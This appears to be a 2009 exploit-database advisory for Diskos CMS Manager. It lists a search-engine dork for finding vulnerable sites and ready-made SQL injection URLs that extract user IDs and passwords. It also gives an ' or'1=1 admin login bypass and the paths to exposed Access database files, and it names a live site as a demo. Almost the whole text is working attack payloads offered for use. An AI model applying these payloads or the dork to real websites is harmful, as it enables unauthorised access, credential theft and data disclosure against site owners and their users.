Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass



EKU-ID: 16122 CVE: OSVDB-53007;CVE-2009-4799;OSVDB-53006;OSVDB-53005;CVE-2009-4798 OSVDB-ID:
Author: AnGeL25dZ Published: 2009-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


************************************************************
**         Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
**  Prodcut:		Diskos CMS Manager
**  Home   : 		http://www.diskos.dk
**  Vunlerability :	SQL Injection & admin byapass & database disclosure
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com
** *********************************************************
** Greetz to :	 ALLAH
**		 All Members of H-T (http://h-t.cc/cc)
**		 All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit:
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
**************************************************************
**
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb
** 		    artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************

# milw0rm.com [2009-03-30]